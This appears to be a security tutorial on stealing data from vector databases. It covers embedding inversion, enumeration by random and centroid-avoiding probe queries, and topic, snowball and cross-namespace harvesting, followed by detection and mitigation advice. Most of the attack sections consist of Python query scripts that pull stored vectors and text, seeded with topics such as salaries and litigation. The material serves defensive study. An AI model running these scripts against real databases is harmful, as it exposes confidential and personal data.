Data Exfiltration via Vector Databases
Data exfiltration techniques for vector databases: embedding inversion to reconstruct documents, enumeration attacks, and similarity-based data harvesting.
Data exfiltration from vector databases is a concern that many organizations underestimate. The common assumption is that embeddings are opaque numerical representations from which original content cannot be recovered. Research has shown this assumption is incorrect: embeddings can be inverted to recover meaningful text, and vector databases can be systematically queried to extract stored content at scale.
Embedding Inversion
Embedding inversion is the process of reconstructing the original input text from its embedding vector. While perfect reconstruction is generally not possible, partial reconstruction often recovers enough information to be useful to an attacker.
How Inversion Works
Embedding models are trained to map text to vectors such that similar texts produce similar vectors. Inversion models are trained on the reverse mapping: given a vector, predict the text that produced it.
# Conceptual inversion attack
# Step 1: Train an inversion model on known text-embedding pairs
inversion_model = train_inversion_model(
    texts=known_texts,
    embeddings=[embedding_model.encode(t) for t in known_texts]
)
# Step 2: Apply the inversion model to target embeddings
target_embedding = stolen_from_vector_db  # Obtained via query or direct access
recovered_text = inversion_model.decode(target_embedding)
Inversion Quality
The quality of inversion depends on several factors:
- Embedding dimensionality — Higher-dimensional embeddings (1536 for OpenAI, 768 for many open-source models) retain more information and are more susceptible to inversion
- Domain specificity — Embeddings of domain-specific text (medical records, legal documents) can be inverted more accurately when the inversion model is trained on similar domain data
- Model availability — If the attacker has access to the same embedding model, they can generate training pairs for the inversion model at will
- Text length — Shorter texts are recovered more completely than longer ones, because a fixed-size embedding captures a larger proportion of a short text's information
Research has demonstrated recovery rates that vary from partial (key phrases and entities) to near-complete (full sentence reconstruction) depending on these factors.
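One way an attacker can score a candidate reconstruction against these factors is to re-embed the recovered text and measure its cosine similarity to the target embedding. The sketch below illustrates the idea; `inversion_quality` and `toy_embed` are hypothetical helpers invented here, and `toy_embed` is a character-frequency stand-in, not a real embedding model (a real attack would use the same model as the victim system):

```python
import numpy as np

def cosine_similarity(a, b):
    a, b = np.asarray(a, dtype=float), np.asarray(b, dtype=float)
    return float(a @ b / (np.linalg.norm(a) * np.linalg.norm(b)))

def inversion_quality(target_embedding, recovered_text, embed):
    # Re-embed the candidate reconstruction and compare it to the target:
    # the closer the cosine similarity is to 1, the better the inversion.
    return cosine_similarity(embed(recovered_text), target_embedding)

# Toy stand-in embedder (character-frequency vector) used only so the
# sketch is self-contained and runnable.
def toy_embed(text, dim=64):
    v = np.zeros(dim)
    for ch in text.lower():
        v[ord(ch) % dim] += 1.0
    return v / np.linalg.norm(v)

target = toy_embed("quarterly revenue projections")
print(inversion_quality(target, "quarterly revenue projections", toy_embed))
```

An exact reconstruction scores 1.0 under this metric; partial reconstructions (key phrases, entities) score lower but still well above unrelated text.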
Practical Inversion
An attacker with query access to a vector database can perform inversion in several ways:
# Method 1: Direct vector access
# If the API returns vector values along with results
results = index.query(vector=probe, top_k=100, include_values=True)
for match in results.matches:
    recovered = inversion_model.decode(match.values)
    print(f"ID: {match.id}, Recovered: {recovered}")
# Method 2: Metadata-assisted inversion
# Metadata often contains the original text or a summary
results = index.query(vector=probe, top_k=100, include_metadata=True)
for match in results.matches:
    # Many RAG systems store the original chunk text in metadata
    if "text" in match.metadata:
        print(f"Original text: {match.metadata['text']}")
Enumeration Attacks
Enumeration attacks systematically extract all or most vectors from a database by making a sequence of queries designed to cover the embedding space.
Exhaustive Query Enumeration
The simplest enumeration approach queries the database with diverse probe vectors to retrieve as many unique results as possible:
# Generate diverse probe vectors to cover the embedding space
retrieved_ids = set()
all_results = []
# Random probing
for i in range(10000):
    probe = np.random.randn(1536)
    probe = probe / np.linalg.norm(probe)
    results = index.query(vector=probe.tolist(), top_k=100)
    for match in results.matches:
        if match.id not in retrieved_ids:
            retrieved_ids.add(match.id)
            all_results.append(match)
print(f"Retrieved {len(retrieved_ids)} unique vectors")
Iterative Exclusion Enumeration
A more efficient approach uses query results to guide subsequent queries away from already-retrieved vectors:
# Start with a random probe
retrieved = []
for iteration in range(1000):
    if not retrieved:
        probe = np.random.randn(1536)
    else:
        # Generate a probe that is far from already-retrieved vectors
        # by moving in the direction opposite to the centroid of retrieved
        # vectors, with a small random perturbation
        centroid = np.mean([r['vector'] for r in retrieved], axis=0)
        probe = -centroid + np.random.randn(1536) * 0.1
    probe = (probe / np.linalg.norm(probe)).tolist()
    results = index.query(vector=probe, top_k=100, include_values=True)
    for match in results.matches:
        if match.id not in {r['id'] for r in retrieved}:
            retrieved.append({
                'id': match.id,
                'vector': match.values,
                'metadata': match.metadata
            })
Index Statistics for Scope Assessment
Before enumerating, the attacker can assess the scope of the database:
stats = index.describe_index_stats()
total_vectors = stats.total_vector_count
namespaces = stats.namespaces
print(f"Total vectors: {total_vectors}")
print(f"Namespaces: {list(namespaces.keys())}")
Similarity-Based Data Harvesting
Similarity-based harvesting uses domain knowledge to extract semantically related content, focusing on high-value data rather than exhaustive enumeration.
Targeted Topic Extraction
An attacker interested in specific topics generates queries designed to retrieve related content:
# Extract all content related to a specific topic
seed_queries = [
    "quarterly revenue and financial projections",
    "executive compensation and stock options",
    "merger and acquisition targets",
    "pending litigation and legal risks",
    "customer data breach incidents"
]
harvested = {}
for query_text in seed_queries:
    query_embedding = embedding_model.encode(query_text)
    results = index.query(
        vector=query_embedding.tolist(),
        top_k=50,
        include_metadata=True
    )
    harvested[query_text] = [m.metadata.get('text', '') for m in results.matches]
Snowball Harvesting
Starting from initial results, use retrieved content to generate more targeted queries:
# Snowball: use retrieved content to find more related content
initial_query = "employee salary information"
queue = [initial_query]
all_harvested = set()
while queue:
    query_text = queue.pop(0)
    query_embedding = embedding_model.encode(query_text)
    results = index.query(
        vector=query_embedding.tolist(),
        top_k=20,
        include_metadata=True
    )
    for match in results.matches:
        if match.id not in all_harvested:
            all_harvested.add(match.id)
            text = match.metadata.get('text', '')
            # Extract key phrases from retrieved text to use as new queries
            new_queries = extract_key_phrases(text)
            queue.extend(new_queries[:3])  # Limit branching
Cross-Namespace Harvesting
If the attacker discovers that data from multiple contexts is stored in different namespaces, they can harvest across namespaces:
# Harvest the same topic across all namespaces
for namespace in discovered_namespaces:
    results = index.query(
        vector=query_embedding.tolist(),
        top_k=50,
        namespace=namespace,
        include_metadata=True
    )
    print(f"Namespace {namespace}: {len(results.matches)} results")
Detection and Mitigation
Vector database exfiltration can be detected through:
- Query volume monitoring — Enumeration attacks require many queries; alert on unusual query rates
- Query diversity analysis — Random probing produces atypical query patterns compared to legitimate application queries
- Result coverage tracking — Monitor what percentage of stored vectors have been returned in query results
- Rate limiting — Limit queries per API key per time window
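The query-volume and coverage signals above can be combined in a per-key monitor. The sketch below is a minimal illustration, not a production detector; `ExfiltrationMonitor` and its thresholds (`rate_limit`, `coverage_alert`) are hypothetical names chosen for this example:

```python
from collections import defaultdict, deque
import time

class ExfiltrationMonitor:
    """Track per-key query rate and cumulative result coverage (illustrative)."""

    def __init__(self, total_vectors, rate_limit=100, window_s=60.0,
                 coverage_alert=0.2):
        self.total = total_vectors
        self.rate_limit = rate_limit          # max queries per window
        self.window_s = window_s
        self.coverage_alert = coverage_alert  # fraction of DB seen by one key
        self.times = defaultdict(deque)       # api_key -> query timestamps
        self.seen_ids = defaultdict(set)      # api_key -> returned vector IDs

    def record(self, api_key, returned_ids, now=None):
        now = time.monotonic() if now is None else now
        q = self.times[api_key]
        q.append(now)
        while q and now - q[0] > self.window_s:  # drop stale timestamps
            q.popleft()
        self.seen_ids[api_key].update(returned_ids)
        alerts = []
        if len(q) > self.rate_limit:
            alerts.append("rate")
        if len(self.seen_ids[api_key]) / self.total >= self.coverage_alert:
            alerts.append("coverage")
        return alerts
```

A key that has been returned 20% of all stored vectors, or that exceeds the per-window query budget, trips an alert even if each individual query looks legitimate.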
Mitigation approaches:
- Do not store original text in metadata — Store only a document ID and retrieve the text from a separate, access-controlled system
- Do not return vector values — Configure the API to return only IDs and scores, not the embedding vectors themselves
- Implement query auditing — Log all queries with sufficient detail to reconstruct an attacker's data access pattern
- Separate access tiers — Use different API keys with different permissions for different consumers, so a compromised low-privilege key cannot query high-sensitivity namespaces
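The first two mitigations can be sketched together: the vector database returns only IDs and scores, and the original text is resolved per-user from a separate, access-controlled store. `ACL`, `TEXT_STORE`, `fetch_text`, and `safe_results` are hypothetical names standing in for a real permission system:

```python
# Per-document access-control list and a separate text store; in a real
# deployment these would be a permissions service and a document database.
ACL = {"doc-1": {"alice"}, "doc-2": {"alice", "bob"}}
TEXT_STORE = {"doc-1": "Q3 revenue projections...", "doc-2": "Public FAQ..."}

def fetch_text(doc_id, user):
    """Resolve text only if the caller is authorized for this document."""
    if user not in ACL.get(doc_id, set()):
        raise PermissionError(f"{user} may not read {doc_id}")
    return TEXT_STORE[doc_id]

def safe_results(matches, user):
    """matches = (doc_id, score) pairs from the vector DB: no raw vectors,
    no raw text. Text is fetched per-user; unauthorized hits are dropped."""
    out = []
    for doc_id, score in matches:
        try:
            out.append({"id": doc_id, "score": score,
                        "text": fetch_text(doc_id, user)})
        except PermissionError:
            continue
    return out
```

With this layout, even an attacker who enumerates the entire index harvests only document IDs and similarity scores; the content itself never leaves the access-controlled store.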
Related Topics
- Inversion Attacks — Technical details of embedding inversion
- Access Control — Access control gaps that enable exfiltration
- Membership Inference — Determining if specific data exists in the database